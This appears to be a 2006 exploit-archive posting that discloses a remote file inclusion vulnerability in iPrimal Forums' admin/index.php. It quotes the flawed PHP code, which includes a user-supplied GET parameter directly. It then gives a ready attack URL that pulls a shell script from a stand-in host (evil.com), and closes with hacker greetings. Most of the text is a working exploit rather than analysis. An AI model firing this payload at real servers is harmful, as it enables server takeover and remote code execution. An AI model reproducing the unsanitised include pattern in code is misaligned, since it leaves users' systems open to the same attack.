~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ iPrimal Forums Remote File Inclusion Download:http://ipigroup.org/downloads/forums.zip Found by Bl0od3r ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerable Code: #line 126-129 ..... if($_GET['p'] == ''){ echo 'Please select an item from the menu above.'; }else{ include($_GET['p'].'.php'); ..... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected File: /admin/index.php =] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability: http://host.com/admin/index.php?p=http://evil.com/shell.txt? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetz:evilcookie,eddy14,matrix_killer Special Greetz to:str0ke! # milw0rm.com [2006-11-08]